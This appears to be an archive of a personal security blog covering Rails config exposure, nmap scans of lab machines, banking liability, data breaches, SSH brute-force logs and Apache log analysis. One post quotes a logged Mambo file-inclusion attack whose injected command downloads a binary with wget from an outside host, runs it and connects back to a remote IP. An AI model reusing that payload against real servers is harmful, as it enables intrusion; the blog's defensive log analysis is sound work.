        from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/commands/generate.rb:1
        from /usr/lib/site_ruby/1.8/rubygems/custom_require.rb:21:in `require'
        from /usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/ 

I started looking around at the folder structure that Ruby installs itself into when you create a new RoR application. Below my main folder, which the tutorial instructed my to create an alias or virtual directory for is the config folder. Inside the config folder is the database.yml file, holding my database information, with accounts and hard-coded passwords. (On my box, it's all localhost only, but still...)

Just to check, I fired up my browser and entered http://myserver/myrailsalias/config/database.yml. All the information popped up. I changed the Apache alias to /mypathtorails/public/ which I didn't see in the tutorial. This seems to be a lot more secure. This doesn't mean RoR is any more or less secure than any other interpreted scripting language for web applications, just that right now, it's easy to install it in a less secure manner.

What's the point? Know what you're installing, where it installs, what permissions it needs, and what context it runs as. And don't put your database.yml someplace where anyone can download it. I know there are websites where I could find it, but I'm not going to try. That doesn't mean someone else isn't writing a bot to find it right now.

Oh, and know how Apache works and httpd.conf works, too. All that is a lot to expect for people looking for a simple programming language.

Posted by Larry at 10:59 AM | Permalink | Comments (0) | TrackBacks (0)

Just for fun, I thought I'd compare the ports open on the various boxes in my lab.

Mac OS X v. 10.3.9 (Running Dave)
PORT STATE SERVICE
21/tcp open ftp (Throws a Win98 .com filename "hole" in nessus)
22/tcp open ssh
139/tcp open netbios-ssn
427/tcp open svrloc
445/tcp open microsoft-ds
548/tcp open afpovertcp

Windows XP SP2 Laptop
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Fedora Core 4
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open https
1241/tcp open nessus
3306/tcp open mysql
10000/tcp open snet-sensor-mgmt (Actually webmin)

Windows Server 2003 DC
PORT STATE SERVICE
42/tcp open nameserver
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
1027/tcp open IIS
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-term-serv

Posted by Larry at 3:12 PM | Permalink | Comments (0) | TrackBacks (0)

I was curious as to what Exchange 12 opened on my old Dell, so I ran a quick nmap scan. I also have SQL 2005 running, so that's open, too. As you can see from the list below, not all nmap service reports are accurate. Pretty short compared to my Fedora Core 4 box running Apache, MySQL, and Sendmail.

PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
1040/tcp open netsaint
1083/tcp open ansoft-lm-1
1155/tcp open nfa
1433/tcp open ms-sql-s
3389/tcp open ms-term-serv
5001/tcp open commplex-link
6001/tcp open X11:1
6002/tcp open X11:2
6004/tcp open X11:4
8009/tcp open ajp13

Two System Log Errors from the scan, One System Log Warning:
None, message: An anonymous session connected from 10.10.10.15 has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Tur nOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day. , Matched on: Type: Error , timestamp: 16:54:50 04/22/106

TermDD:50 on xxxx, category: None, message: The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the client. , Matched on: Type: Error , timestamp:16:55:08 04/22/106

The Security System has received an authentication request that could not be decoded. The request has failed.

The Exchange roles running on this box include everything except gateway. (Client Access, Mail Store, Bridgehead).

For the full Nessus 3.0 report, read on.

Continue reading "Exchange 12: Open Ports" »

Posted by Larry at 4:36 PM | Permalink | Comments (0) | TrackBacks (1)

There is no "undo" button. When a fast-food cashier at Burger King accidentally entered $4,300 for couple of hamburgers onto a debit card, the money was gone from the account for three days. Despite Burger King's immediate action to refund the money, Bank America sat on the money for three days.



This kind of mistake could happen anywhere, anytime, and the three days
involved could cause a missed mortgage payment, a bank penalty fee, and
a permanent black mark in a credit history, but there's still nothing
the Bank will do about it. In fact, they made more money from the
mistake in two ways: charging Burger King to process the refund, and
the 3 days interest on $4,300.



When you signed that debit card agreement, you gave all your rights
away, and it can cost you real money. When it comes to online banking
and debit transactions, the banks are watching their money, not yours.



The Bank is not your friend, part one.

Posted by Larry at 4:18 PM | Permalink | Comments (0) | TrackBacks (0)

The recent un-diplomatic complaints from London’s Mayor concerning the U.S. Embassy in London’s refusal to pay taxes from which diplomats are exempt gave me an idea. The United States should exempt foreign diplomats in the United States from tolls. We should give them all free EZ Passes attached to their license plates. It would make them a lot easier to track. The State Department should probably start embedding an RFID tag in their tax-exempt cards, too.

Of course, they may already be embedding RFID tags in the license plates. The automated toll gates could easily be connected to a shadow tracking system. You could find out for yourself with an RFID reader, but you'd probably have more fun with an RFID reader/writer after you figure out who uses field-programmable RFID chips.

Posted by Larry at 2:45 PM | Permalink | Comments (0) | TrackBacks (0)

Since I detailed the script attacks on my Apache box looking for unpatched open-source software like phpmyadmin and Mambo , I get interesting search traffic from people looking for the hacking tools and scripts involved. They search for “pmafind” and “r3v3ng4ns,” and I think they’re actually looking to try and use the scripts rather than defend themselves.

I have still had no luck in identifying the “mystery
location” listed in my Google
Maps tour. I was going to post pictures of it from the ground, but the
signs surrounding the area prohibit that, so you won’t be seeing them here.



Declan Butler
is doing cool things with tracking the Avian flu on Google Earth, and has
another Google Earth/GIS story coming out soon. 

I hope that when I return from Spring Break (undisclosed location), the world isn’t all 28 Days Later.

Posted by Larry at 1:03 AM | Permalink | Comments (0) | TrackBacks (0)

Hackers have stolen hundreds of thousands of personal records over the past year, and many more thousands have been "lost or stolen." That's what happens when you fail to log backup tapes in your data center/server room/closet. Why not encrypt the backup tapes using the built-in software functions? There's a chance you might not be able to recover them as quickly. USA Today reported that the data of 55 million Americans have been exposed.

Last year could be the year that many more criminals discovered that hacking is profitable. Script kiddies and web site defacements are no longer a top threat. The people hacking into your network no longer want credit -- they want your money and records. And they will do their best to make sure you never know about the intrusion. Imagine the bullet list for a criminal mastermind PowerPoint presentation: hack into system, get data, erase logs, establish new credit, buy stuff.

Given the number of unemployed with education and the inability of law enforcement to track activity across borders quickly, international organized online crime will increase. Which do you fear more: a script kiddie going for web site defacement and shout-outs or a team of experienced, professional criminals targeting your data?

Our government will probably not be able to help. As cyber-crime grows increasingly sophisticated, the cyber-crime-fighting budget was cut. According to the USA Today story, cyber-crime now beats illegal drug sales in dollars, at $105 billion, although figures from the government on cyber-crime losses are generally exaggerated. Law enforcement can’t even do anything when someone steals your laptop and signs in to MSN Messenger as you.

Once again, you’re on your own to defend yourself and your data. The credit-reporting companies have responded by offering a pay-service to monitor your own data. And don’t leave your laptop unsecured anywhere ever. Those consumer-marketed biometric gadgets and USB keys may or may not protect your data, but the laptop is a commodity and even password-protected BIOSes can be rewritten.

What to do? Protect yourself and your data. No one is going to help you, except maybe an expensive computer security consulting firm.

Posted by Larry at 12:42 PM | Permalink | Comments (0) | TrackBacks (0)

Digital signatures sound cool -- imagine being able to sign a check using a digital signature to guarantee the check's authenticity and irrevocability. Unfortunately, there's a little difference proposed by most banks when dealing with digital signatures. Irrevocable means that if anything gets signed with your digital signature, the burden of proof is on you the consumer to prove it wasn't you. Currently, when you sign a check, the burden of proof is on the bank. If it's not your signature, you don't pay. It won't be that way using a digital signature.

Banks may say they protect you from fraud, but they really protect themselves. If your identity gets stolen, the burden of proof is yours to prove it's not you that owes all that money. When ATMs were first introduced, banks argued they were infallible and anyone claiming losses from wrongful ATM withdrawals must be trying to defraud the bank of money. It lasted until the banks went after criminals who stole from the "infallible" ATMs.

As banks and consumers go further into online transactions in the digital age, be wary. The banks are placing more and more liabilities on the consumer. When you engage in online banking, the terms of service you click "yes" to agree to generally state that all bank records are definitive. If the bank says you withdrew it, you withdrew it and that's that.

A couple of years ago, I sent my online credit card payment to the cable company by mistake. I tried in vain to get a refund and settled for having a credit on my account that would cover a year of cable. At the end of that year, the fraud investigator decided that she couldn't find the money in the cable company's accounting system, and removed the credit from my account. After I found my bank statement from a year earlier, faxed it to her, and got my bank to call, we cleared things up, but the burden of proof was on me. And my bank wasn't that helpful, either, insisting that I find the bank statements from a year ago or pay for a copy from them.

What was shocking was that a year after crediting the money into my account, the cable company couldn't track its own cash, and assumed it must have been some fraud. The burden of proof was on me, and I really didn't enjoy tracking down a bank statement from the year before.

Posted by Larry at 4:52 PM | Permalink | Comments (0) | TrackBacks (0)

It's easy to miss news buried back in the business section given what's going on in the front section, but this is pretty harsh. Guidance Software, which makes audit software, was itself hacked. Just about everyone who is anyone in the computer forensic investigation world uses this software. The hacker(s?) got names, card numbers, including the CVV codes on the back, which aren't even supposed to be stored, according to Visa and Mastercard guidelines. In case you're wondering, Visa and MC spell out exactly what measures merchants should take to protect this data, and it appears that Guidance violated several of them, resulting in a massive catch for the hackers.

You'd think you'd be safe, purchasing software with a credit card from a premier security software company. Following these guidelines is more important than ever, since hackers are no longer interested in mere website defacements. They're going after the money.

Visit a bank. Note the security measures. They don't leave money lying around. Even if they did, it wouldn't be legal to steal it, but you also wouldn't keep your money there.

Posted by Larry at 1:26 AM | Permalink | Comments (0) | TrackBacks (0)

P>Security guru Bruce Schneier has a couple of recent news items on his blog that everyone should read. First off is the tale of backup tapes containing millions of banking records that were "lost." It turns out they weren't lost at all. The package control system was hacked to make the tape delivery a low-security item not requiring multiple signatures. After the package was stolen, hackers replaced the original security settings on the package. For companies that use paid off-site storage contractors, this is very scary.

Dr. Scheier's second entry is about a story in Nature, a scholarly scientific journal to which I subscribe and have used for writing reviews for my classes. Apparently, not everything in Nature is peer-reviewed, and a paper on a new type of encryption turned out to be almost complete bunk. Of course, you can't read the original piece in Nature without subscribing, (I got the student rate), but Schneier has an excellent critique.

Posted by Larry at 3:35 PM | Permalink | Comments (0) | TrackBacks (0)

OK, picking out hacking attempts from logfiles is getting tired, so I promise, just one more. Apparently, at other IST schools, attempting to log on to other peoples' servers is what they teach. I see the entries regularly in my emails from Logwatch. What makes this one different is that it comes from an IST school like mine.

This brings up the (tired old) subject of University networks. They need to remain open and useful to students and professors, but they need to be protected from abuse and being used to abuse others. Preventing attacks like these from a campus would be hard. You could block port 22 outbound, but that would cut off a lot of legitimate activity. You could have all students sign an acceptable use policy, which might help you enforce rules against someone when you catch them. You could monitor network traffic for patterns like these, but that would involve monitoring a lot of network traffic at great expense. Universities charge enough without having to purchase a lot of monitoring equipment and software and hiring staff to watch its students, but this is what the Federal government wants them to do. Given how many attacks originate at Universities, it's easy to understand why. The Morris worm nearly took down the Internet from a University almost twenty years ago.

The more things change...

Logwatch entries:

sshd:
    Authentication Failures:
       unknown (ist.pct.edu): 101 Time(s)
       apache (ist.pct.edu): 1 Time(s)
       bin (ist.pct.edu): 1 Time(s)
       mail (ist.pct.edu): 1 Time(s)
       mysql (ist.pct.edu): 1 Time(s)
       nobody (ist.pct.edu): 1 Time(s)
       root (ist.pct.edu): 1 Time(s)
       xfs (ist.pct.edu): 1 Time(s)
    Invalid Users:
       Unknown Account: 101 Time(s)

Failed logins from these:
    admin/password from ::ffff:72.20.218.49: 1 Time(s)
    adsl/password from ::ffff:72.20.218.49: 1 Time(s)
    akon/password from ::ffff:72.20.218.49: 1 Time(s)
    chun/password from ::ffff:72.20.218.49: 1 Time(s)
    cisco/password from ::ffff:72.20.218.49: 1 Time(s)
    cyd/password from ::ffff:72.20.218.49: 1 Time(s)
    deamon/password from ::ffff:72.20.218.49: 1 Time(s)
    dsl/password from ::ffff:72.20.218.49: 1 Time(s)
    favorites/password from ::ffff:72.20.218.49: 1 Time(s)
    fuji/password from ::ffff:72.20.218.49: 1 Time(s)
    fujiwara/password from ::ffff:72.20.218.49: 1 Time(s)
    fukumoto/password from ::ffff:72.20.218.49: 1 Time(s)
    genki/password from ::ffff:72.20.218.49: 1 Time(s)
    granlumie/password from ::ffff:72.20.218.49: 1 Time(s)
    guest/password from ::ffff:72.20.218.49: 1 Time(s)
    hagiwara/password from ::ffff:72.20.218.49: 1 Time(s)
    hakko/password from ::ffff:72.20.218.49: 1 Time(s)
    hayashi/password from ::ffff:72.20.218.49: 2 Time(s)
    hayashy/password from ::ffff:72.20.218.49: 1 Time(s)
    hiramara/password from ::ffff:72.20.218.49: 1 Time(s)
    hiramaru/password from ::ffff:72.20.218.49: 1 Time(s)
    hiroshi/password from ::ffff:72.20.218.49: 1 Time(s)
    history/password from ::ffff:72.20.218.49: 1 Time(s)
    hokko/password from ::ffff:72.20.218.49: 1 Time(s)
    hokoyama/password from ::ffff:72.20.218.49: 1 Time(s)
    horikoshi/password from ::ffff:72.20.218.49: 1 Time(s)
    hotline/password from ::ffff:72.20.218.49: 1 Time(s)
    hotmail/password from ::ffff:72.20.218.49: 1 Time(s)
    ikanri/password from ::ffff:72.20.218.49: 1 Time(s)
    info/password from ::ffff:72.20.218.49: 1 Time(s)
    install/password from ::ffff:72.20.218.49: 1 Time(s)
    internet/password from ::ffff:72.20.218.49: 1 Time(s)
    invite/password from ::ffff:72.20.218.49: 1 Time(s)
    iocha/password from ::ffff:72.20.218.49: 1 Time(s)
    ishihara/password from ::ffff:72.20.218.49: 1 Time(s)
    ito/password from ::ffff:72.20.218.49: 1 Time(s)
    kajipar/password from ::ffff:72.20.218.49: 1 Time(s)
    kakou/password from ::ffff:72.20.218.49: 1 Time(s)
    kamata/password from ::ffff:72.20.218.49: 1 Time(s)
    kamato/password from ::ffff:72.20.218.49: 1 Time(s)
    kato/password from ::ffff:72.20.218.49: 1 Time(s)
    kawakami/password from ::ffff:72.20.218.49: 1 Time(s)
    kay/password from ::ffff:72.20.218.49: 1 Time(s)
    ken/password from ::ffff:72.20.218.49: 1 Time(s)
    kenkou/password from ::ffff:72.20.218.49: 1 Time(s)
    kento/password from ::ffff:72.20.218.49: 1 Time(s)
    kobe/password from ::ffff:72.20.218.49: 1 Time(s)
    kohi/password from ::ffff:72.20.218.49: 1 Time(s)
    kohitujikai/password from ::ffff:72.20.218.49: 1 Time(s)
    kumemura/password from ::ffff:72.20.218.49: 1 Time(s)
    lestat/password from ::ffff:72.20.218.49: 1 Time(s)
    mac/password from ::ffff:72.20.218.49: 1 Time(s)
    masumura/password from ::ffff:72.20.218.49: 1 Time(s)
    matsuo/password from ::ffff:72.20.218.49: 1 Time(s)
    mikata/password from ::ffff:72.20.218.49: 1 Time(s)
    miura/password from ::ffff:72.20.218.49: 1 Time(s)
    motoka/password from ::ffff:72.20.218.49: 1 Time(s)
    motooka/password from ::ffff:72.20.218.49: 1 Time(s)
    nakamoto/password from ::ffff:72.20.218.49: 1 Time(s)
    nakamura/password from ::ffff:72.20.218.49: 1 Time(s)
    nakayama/password from ::ffff:72.20.218.49: 1 Time(s)
    new/password from ::ffff:72.20.218.49: 1 Time(s)
    nuke/password from ::ffff:72.20.218.49: 1 Time(s)
    otashiro/password from ::ffff:72.20.218.49: 1 Time(s)
    play/password from ::ffff:72.20.218.49: 1 Time(s)
    playboy/password from ::ffff:72.20.218.49: 1 Time(s)
    proba/password from ::ffff:72.20.218.49: 1 Time(s)
    prova/password from ::ffff:72.20.218.49: 1 Time(s)
    prueba/password from ::ffff:72.20.218.49: 1 Time(s)
    register/password from ::ffff:72.20.218.49: 1 Time(s)
    robert/password from ::ffff:72.20.218.49: 1 Time(s)
    roberto/password from ::ffff:72.20.218.49: 1 Time(s)
    ryu/password from ::ffff:72.20.218.49: 1 Time(s)
    saito/password from ::ffff:72.20.218.49: 1 Time(s)
    sales/password from ::ffff:72.20.218.49: 2 Time(s)
    search/password from ::ffff:72.20.218.49: 1 Time(s)
    sesso/password from ::ffff:72.20.218.49: 1 Time(s)
    sex/password from ::ffff:72.20.218.49: 1 Time(s)
    shimada/password from ::ffff:72.20.218.49: 1 Time(s)
    shiraki/password from ::ffff:72.20.218.49: 1 Time(s)
    shiraky/password from ::ffff:72.20.218.49: 1 Time(s)
    takato/password from ::ffff:72.20.218.49: 1 Time(s)
    teraji/password from ::ffff:72.20.218.49: 1 Time(s)
    test/password from ::ffff:72.20.218.49: 4 Time(s)
    toi/password from ::ffff:72.20.218.49: 1 Time(s)
    toy/password from ::ffff:72.20.218.49: 1 Time(s)
    transfer/password from ::ffff:72.20.218.49: 1 Time(s)
    trust/password from ::ffff:72.20.218.49: 1 Time(s)
    try/password from ::ffff:72.20.218.49: 1 Time(s)
    tujikai/password from ::ffff:72.20.218.49: 1 Time(s)
    wap/password from ::ffff:72.20.218.49: 1 Time(s)
    wara/password from ::ffff:72.20.218.49: 1 Time(s)
    web/password from ::ffff:72.20.218.49: 1 Time(s)
    www/password from ::ffff:72.20.218.49: 1 Time(s)
    yamanaka/password from ::ffff:72.20.218.49: 1 Time(s)
    yokoya/password from ::ffff:72.20.218.49: 1 Time(s)

Posted by Larry at 4:58 PM | Permalink | Comments (0) | TrackBacks (0)

I am seeing attacks on popular open-source software that runs on linux, e.g.

129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20
131.155.98.128/cback;chmod%20744%20cback;./cback%20
194.112.220.37%208080;echo%20YYY;echo| 
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"

(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)

These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, 129.27.140.4 tracks here: optikom2.inw.tu-graz.ac.at, -- the Graz University of Technology in Austria. But the request is calling a script from here: lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It uses more code from here: pc01.irce.tue.nl , someone's computer in the Netherlands. Finally, it looks like this server gets notified: 194.112.220.37: www.lbsschrems.at, WVNET Information und Kommunikation GmbH, somone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.

The code here, http://131.155.98.128/cback, appears to be something in C that requires some include files. The initial script, here:
http://148.81.141.12/cmd.gif is a defacement script. Note that it doesn't open in Netscape -- just IE.

<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originais e por favor, entre em contato comigo... ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script, n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!! -->

At least our script writer left us his email address. He just wrote the code, of course, he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): wordpress, phpgroupare, drupal and awstats. What weakness do these applications have in common? Xml-rpc on php.

It looks like Apache needs a tool similar to Windows/IIS's urlscan, which prevents attacks like these from getting to the webserver in the first place. These attacks are increasingly common, but there's no newspaper headlines, as was the case with attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.

Weak web applications may mean your firewall is really just a router for port 80 traffic.

Posted by Larry at 5:09 AM | Permalink | Comments (0) | TrackBacks (0)

Just when I was running out of memory to run my new photo gallery (Gallery 2),
I checked my log files to see what was causing some issues for me. It
turns out that Gallery2 and SELinux do not get along so well, but if
you edit your policy files, it can be made to work.



The new attack:

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"